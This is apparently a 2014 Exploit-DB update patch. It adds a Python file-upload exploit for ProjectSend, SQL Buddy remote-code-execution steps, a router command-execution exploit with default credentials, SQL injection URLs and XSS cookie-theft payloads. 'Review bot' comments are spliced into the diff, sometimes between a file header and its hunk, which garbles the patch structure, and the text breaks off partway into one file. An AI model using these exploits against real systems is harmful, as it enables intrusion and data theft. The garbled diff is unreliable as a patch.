From a4940a7faa006043800e54bb93b4851727b54b25 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Thu, 18 Dec 2014 04:50:37 +0000
Subject: [PATCH] Updated 12_18_2014

---
 files.csv | 34 +++-
 platforms/hardware/webapps/35556.txt | 56 ++++++
 platforms/linux/remote/35554.txt | 11 ++
 platforms/php/webapps/35424.py | 24 +++
 platforms/php/webapps/35428.txt | 40 ++++
 platforms/php/webapps/35547.txt | 9 +
 platforms/php/webapps/35548.txt | 11 ++
 platforms/php/webapps/35550.txt | 29 +++
 platforms/php/webapps/35551.txt | 68 +++++++
 platforms/php/webapps/35555.txt | 9 +
 platforms/php/webapps/35557.txt | 7 +
 platforms/php/webapps/35558.txt | 7 +
 platforms/php/webapps/35559.txt | 13 ++
 platforms/php/webapps/35561.txt | 9 +
 platforms/php/webapps/35562.txt | 9 +
 platforms/unix/remote/35549.rb | 264 +++++++++++++++++++++++++++
 platforms/windows/dos/35552.py | 57 ++++++
 platforms/windows/dos/35553.pl | 56 ++++++
 platforms/windows/local/35512.txt | 47 -----
 platforms/windows/local/35534.txt | 38 ----
 platforms/windows/local/35537.txt | 37 ----
 platforms/windows/local/35542.txt | 41 -----
 platforms/windows/remote/35563.pl | 82 +++++++++
 23 files changed, 785 insertions(+), 173 deletions(-)
 create mode 100755 platforms/hardware/webapps/35556.txt
 create mode 100755 platforms/linux/remote/35554.txt
 create mode 100755 platforms/php/webapps/35424.py
 create mode 100755 platforms/php/webapps/35428.txt
 create mode 100755 platforms/php/webapps/35547.txt
 create mode 100755 platforms/php/webapps/35548.txt
 create mode 100755 platforms/php/webapps/35550.txt
 create mode 100755 platforms/php/webapps/35551.txt
 create mode 100755 platforms/php/webapps/35555.txt
 create mode 100755 platforms/php/webapps/35557.txt
 create mode 100755 platforms/php/webapps/35558.txt
 create mode 100755 platforms/php/webapps/35559.txt
 create mode 100755 platforms/php/webapps/35561.txt
 create mode 100755 platforms/php/webapps/35562.txt
 create mode 100755 platforms/unix/remote/35549.rb
 create mode 100755 platforms/windows/dos/35552.py
 create mode 100755 platforms/windows/dos/35553.pl
 delete mode 100755 platforms/windows/local/35512.txt
 delete mode 100755 platforms/windows/local/35534.txt
 delete mode 100755 platforms/windows/local/35537.txt
 delete mode 100755 platforms/windows/local/35542.txt
 create mode 100755 platforms/windows/remote/35563.pl

diff --git a/files.csv b/files.csv
index 3d6820f0f..620272643 100755
--- a/files.csv
+++ b/files.csv
@@ -12700,13 +12700,13 @@ id,file,description,date,author,platform,type,port
 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection Vulnerability",2010-07-31,gendenk,php,webapps,0
 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0
 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
-14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
+14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
 14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0
 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0
 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0
 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0
-14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0
+14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0
 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow Exploit",2010-08-02,s-dz,windows,local,0
 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability",2010-08-02,secret,php,webapps,0
14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0 
@@ -12747,12 +12747,12 @@ id,file,description,date,author,platform,type,port
 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0
 14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0
 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0
-14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
+14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0
 14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x Blind SQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
-14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
+14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
 14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
 14595,platforms/php/webapps/14595.html,"wizmall 6.4 CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0
 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
@@ -12974,7 +12974,7 @@ id,file,description,date,author,platform,type,port
 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0
 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0
 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0
-14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
+14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
 14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0
 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0
 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0
@@ -13004,7 +13004,7 @@ id,file,description,date,author,platform,type,port
 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0
 14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0
 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0
-14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0
+14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0
 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0
 14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80
 14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0
@@ -31911,8 +31911,10 @@ id,file,description,date,author,platform,type,port
 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
+35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0
 35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
+35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@@ -31988,7 +31990,6 @@ id,file,description,date,author,platform,type,port
 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
-35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0
 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
@@ -32007,10 +32008,23 @@ id,file,description,date,author,platform,type,port
 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
-35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
-35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
-35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
 35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80
+35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 'pid' Parameter SQL Injection Vulnerability",2011-03-30,RoAd_KiLlEr,php,webapps,0
+35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0
+35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80
+35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0
+35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80
+35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0
+35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0
+35554,platforms/linux/remote/35554.txt,"Perl 5.x 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0
+35555,platforms/php/webapps/35555.txt,"AWCM 2.x 'search.php' Cross Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0
+35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0
+35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection Vulnerability",2011-04-04,KedAns-Dz,php,webapps,0
+35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross Site Scripting Vulnerability",2011-04-02,KedAns-Dz,php,webapps,0
+35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
+35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 'link' Parameter Cross Site Scripting Vulnerability",2011-04-04,"John Leitch",php,webapps,0
+35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 'ajax_action' Parameter Cross Site Scripting Vulnerability",2011-04-03,"John Leitch",php,webapps,0
+35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 'index.php' Arbitrary File Download Vulnerability",2011-04-03,KedAns-Dz,windows,remote,0
diff --git a/platforms/hardware/webapps/35556.txt b/platforms/hardware/webapps/35556.txt
new file mode 100755
index 000000000..3a0530ce6
--- /dev/null
+++ b/platforms/hardware/webapps/35556.txt
@@ -0,0 +1,56 @@
+####################################################################
+#
+# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
+# Date: 2014/12/10
+# Exploit Author: Chako
+# Vendor Homepage: https://www.ciktel.com/
+#
+####################################################################
+
+Description:
+ CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
+ and can lead to Command Execution.
+
+
+Exploit:
+
+1) Login as a normal user
+ Default Username: User Password:cikvoip
+
+2) change URL to http://URL/adm/system_command.asp
+ and now u can run commands.
+
+
+Example:
+
+Command: ls /etc_rw/web
+
+Result:
+
+internet
+cgi-bin
+homemode_conf.asp
+menu-en.swf
+wireless
+md5.js
+hotelmode_conf.asp
+waitAndReboot.asp
+graphics
+menu.swf
+getMac.asp
+quickconfig.asp
+javascript
+firewall
+home.asp
+customermode_conf.asp
+wait.asp
+station
+login.asp
+main.css
+overview.asp
+style
+voip
+lang
+wps
+usb
+adm
diff --git a/platforms/linux/remote/35554.txt b/platforms/linux/remote/35554.txt
new file mode 100755
index 000000000..d31cef11a
--- /dev/null
+++ b/platforms/linux/remote/35554.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47124/info
+
+Perl is prone to a security-bypass weakness that occurs when laundering tainted input.
+
+Attackers can leverage this issue to bypass security checks in perl applications that rely on TAINT mode protection functionality. This opens such applications up to potential attacks that take advantage of the software's failure to properly sanitize user-supplied input.
+
+The following example input is available:
+
+> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'
+
+> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'
\ No newline at end of file
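Review bot: The 35556.txt advisory records no vendor status and no remediation, although its own steps locate the flaw: an account that only holds the ordinary user role (step 1, with the default credentials the file lists) can open `/adm/system_command.asp` and run shell commands, which reads as a missing authorization check on the administrative page rather than a privilege escalation in the usual sense. A `Vendor Status:` header line (value to be filled in by the author) and a closing line such as `Mitigation: change the default User password and restrict the /adm/ pages to the administrator role until a firmware fix is available` would make the file usable by defenders. `vulnerabilitie` in the Description block should read `vulnerability`.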
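Review bot: The two example invocations at the end of 35554.txt are byte-identical, both using `$u=lc($t)`, while the text names both `lc()` and `uc()`; presumably the second line was meant to exercise `uc()`, i.e. `$u=uc($t)`, so as written it adds nothing. The advisory also never states what the `printf` is expected to show versus what affected builds show, which is the whole point of the demonstration; a sentence such as `Expected output: 1,1 (both values tainted); affected versions print <observed output here>` — with the observed value filled in from a real run — would make the weakness verifiable and give maintainers a regression check.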
diff --git a/platforms/php/webapps/35424.py b/platforms/php/webapps/35424.py
new file mode 100755
index 000000000..7a58c08a2
--- /dev/null
+++ b/platforms/php/webapps/35424.py
@@ -0,0 +1,24 @@
+#!/usr/bin/python
+
+# Exploit Title: ProjectSend r-651 File Upload
+# Date: December 01, 2014
+# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
+# Vendor Homepage: http://www.projectsend.org/
+# Software Link: http://www.projectsend.org/download/67/
+# Version: r-561
+# Tested on: Kubuntu 14.10 x64
+
+
+import sys
+import requests
+scriptName = sys.argv[0]
+if (len(sys.argv) != 3):
+ print "Please enter the target path and the file to upload."
+ print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
+ quit()
+print "Exploiting ProjectSend-r561 File Upload .."
+url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
+print "Sending Url " + url
+files = {'file': open(sys.argv[2], 'rb')}
+r = requests.post(url, files=files)
+print r.text
\ No newline at end of file
diff --git a/platforms/php/webapps/35428.txt b/platforms/php/webapps/35428.txt
new file mode 100755
index 000000000..4a53feda2
--- /dev/null
+++ b/platforms/php/webapps/35428.txt
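Review bot: The header line `# Exploit Title: ProjectSend r-651 File Upload` disagrees with `# Version: r-561` five lines below, with the `ProjectSend-r561` strings in the code, and with the files.csv entry added in this commit; `r-651` looks like a transposition and should read `r-561`. The handle opened in `files = {'file': open(sys.argv[2], 'rb')}` is never closed; `with open(sys.argv[2], 'rb') as fh:` followed by `r = requests.post(url, files={'file': fh})` releases it once the request returns. The script then prints `r.text` without looking at `r.status_code`, so a 403 or 404 from `process-upload.php` is reported in the same way as an accepted upload; a one-line `print "HTTP status: %d" % r.status_code` before the body would make the outcome unambiguous.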
@@ -0,0 +1,40 @@
+# Exploit Title: SQL Buddy Remote Code Execution
+# Date: November 29 2014
+# Exploit Author: Fady Osman (@fady_osman)
+# Youtube Channel : https://www.youtube.com/user/cutehack3r
+# Vendor Homepage: http://sqlbuddy.com/
+# Software Link:
+https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip
+# Version: SQL Buddy 1.3.3
+# Tested on: Kubuntu 14.10
+
+SQLBuddy provides a web based mysql administration and it's included in
+packages like wamp server.
+
+SQL Buddy suffers from a remote code execution. This happens due to the
+fact that it allows the user to login using any server he wants and that it
+allows the user to export data from the database to a file on the webserver.
+
+In order to exploit this bug do the following steps:
+
+1- Use a sql server you control and have a valid credentials for (You can
+use one of the free mysql hosting services).
+2- Create a database and a table with one column of type text.
+3- Insert the php code you want to execute into that table.
+4- Choose the previously created table from the left menu.
+5- Click Export from the top menu.
+6- Choose CSV format.
+7- Choose "Text File" and name the file with php extension for example
+shell.php.
+
+The exported file will be at : sqlbuddy/exports/ assuming you installed
+sqlbuddy in a folder named sqlbuddy.
+
+--
+
+*Regards,*
+[image: Fady Osman on about.me]
+
+Fady Osman
+about.me/Fady_Osman
+
diff --git a/platforms/php/webapps/35547.txt b/platforms/php/webapps/35547.txt
new file mode 100755
index 000000000..bf58dcd93
--- /dev/null
+++ b/platforms/php/webapps/35547.txt
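Review bot: The 35428.txt advisory stops at the reproduction steps and gives no remediation, although the two root causes it names itself (login against an arbitrary database host, export into the web-served `sqlbuddy/exports/` directory) each suggest one; a closing line such as `Mitigation: restrict the login form to the local database host and keep exports/ outside the web root or deny script execution in it` would make the file useful to the defenders who read it. The header also omits a vendor-contact or fix status, which the other advisories in this commit (for example 35551.txt's `Vendor Status:` line) provide. The trailing mail-client signature (`--`, `*Regards,*`, `[image: Fady Osman on about.me]`) is not part of the advisory and could be dropped.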
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47100/info
+
+ICJobSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ICJobSite 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/icjobsite/index.php?page=position_details&pid=[SQL-Injection]
\ No newline at end of file
diff --git a/platforms/php/webapps/35548.txt b/platforms/php/webapps/35548.txt
new file mode 100755
index 000000000..24152b129
--- /dev/null
+++ b/platforms/php/webapps/35548.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47104/info
+
+InTerra Blog Machine is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+InTerra Blog Machine 1.84 is vulnerable; other versions may also be affected.
+
+
+ '> +
diff --git a/platforms/php/webapps/35550.txt b/platforms/php/webapps/35550.txt
new file mode 100755
index 000000000..4e34a92a8
--- /dev/null
+++ b/platforms/php/webapps/35550.txt
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/47105/info
+
+Collabtive is prone to multiple remote input-validation vulnerabilities including cross-site scripting, HTML-injection, and directory-traversal issues.
+
+Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, and steal cookie-based authentication credentials.
+
+Collabtive 0.6.5 is vulnerable; other versions may also be affected.
+
+Directory Traversal:
+
+http://www.example.com/thumb.php?pic=./../../../../../tmp/photo.jpg
+
+Cross-site Scripting:
+
+http://www.example.com/managetimetracker.php?action=editform&tid=1&id=1">
+http://www.example.com/manageuser.php?action=profile&id=1">
+
+
+HTML-injection:
+
+
+'> + + +
+
+
diff --git a/platforms/php/webapps/35551.txt b/platforms/php/webapps/35551.txt
new file mode 100755
index 000000000..1eab4e4c4
--- /dev/null
+++ b/platforms/php/webapps/35551.txt
@@ -0,0 +1,68 @@
+Advisory: Persistent XSS Vulnerability in CMS Papoo Light v6
+Advisory ID: SROEADV-2014-01
+Author: Steffen Rösemann
+Affected Software: CMS Papoo Version 6.0.0 Rev. 4701
+Vendor URL: http://www.papoo.de/
+Vendor Status: fixed
+CVE-ID: -
+
+==========================
+Vulnerability Description:
+==========================
+
+The CMS Papoo Light Version has a persistent XSS vulnerability in its guestbook functionality and in its user-registration functionality.
+
+==================
+Technical Details:
+==================
+
+XSS-Vulnerability #1:
+
+Papoo Light CMS v6 provides the functionality to post comments on a guestbook via the following url: http://{target-url}/guestbook.php?menuid=6.
+
+The input fields with the id „author“ is vulnerable to XSS which gets stored in the database and makes that vulnerability persistent.
+
+Payload-Examples:
+
+
+
+
+XSS-Vulnerability #2:
+
+People can register themselves on Papoo Light v6 CMS at http://{target-url}/account.php?menuid=2. Instead of using a proper username, an attacker can inject HTML and/or JavaScriptcode on the username input-field.
+
+Code gets written to the database backend then. Attacker only has to confirm his/her e-mail address to be able to login and spread the code by posting to the forum or the guestbook where the username is displayed.
+
+Payload-Examples:
+
+see above (XSS #1)
+
+=========
+Solution:
+=========
+
+Update to the latest version
+
+====================
+Disclosure Timeline:
+====================
+13-Dec-2014 – found XSS #1
+13-Dec-2014 - informed the developers (XSS #1)
+14-Dec-2014 – found XSS #2
+14-Dec-2014 – informed the developers (XSS #2)
+15-Dec-2014 - release date of this security advisory
+15-Dec-2014 - response and fix by vendor
+15-Dec-2014 - post on BugTraq
+
+========
+Credits:
+========
+
+Vulnerability found and advisory written by Steffen Rösemann.
+
+===========
+References:
+===========
+
+http://www.papoo.de/
+http://sroesemann.blogspot.de
\ No newline at end of file
diff --git a/platforms/php/webapps/35555.txt b/platforms/php/webapps/35555.txt
new file mode 100755
index 000000000..feb9e697d
--- /dev/null
+++ b/platforms/php/webapps/35555.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47126/info
+
+AWCM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+AWCM 2.2 and prior versions are vulnerable.
+
+http://www.example.com/awcm/search.php?search=&where=all
\ No newline at end of file
diff --git a/platforms/php/webapps/35557.txt b/platforms/php/webapps/35557.txt
new file mode 100755
index 000000000..6a56d348b
--- /dev/null
+++ b/platforms/php/webapps/35557.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47128/info
+
+PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[Path]/articles.php?article_id=-1+union+select+version()--
\ No newline at end of file
diff --git a/platforms/php/webapps/35558.txt b/platforms/php/webapps/35558.txt
new file mode 100755
index 000000000..94c6d065d
--- /dev/null
+++ b/platforms/php/webapps/35558.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47130/info
+
+PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[Path]/articles.php?article_id=">
\ No newline at end of file
diff --git a/platforms/php/webapps/35559.txt b/platforms/php/webapps/35559.txt
new file mode 100755
index 000000000..0a6018e4e
--- /dev/null
+++ b/platforms/php/webapps/35559.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47131/info
+
+MyBB is prone to multiple security vulnerabilities. These vulnerabilities include a username-enumeration weakness, an XML-injection vulnerability, and a cross-site scripting vulnerability.
+
+Exploiting these issues may allow attackers to discern valid usernames, which may aid them in brute-force password cracking or other attacks. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
+
+Versions prior to 1.6.2 and 1.4.15 are vulnerable.
+
+XML-injection:
+http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cxml/%3E
+
+XSS:
+http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35561.txt b/platforms/php/webapps/35561.txt
new file mode 100755
index 000000000..785338427
--- /dev/null
+++ b/platforms/php/webapps/35561.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47141/info
+
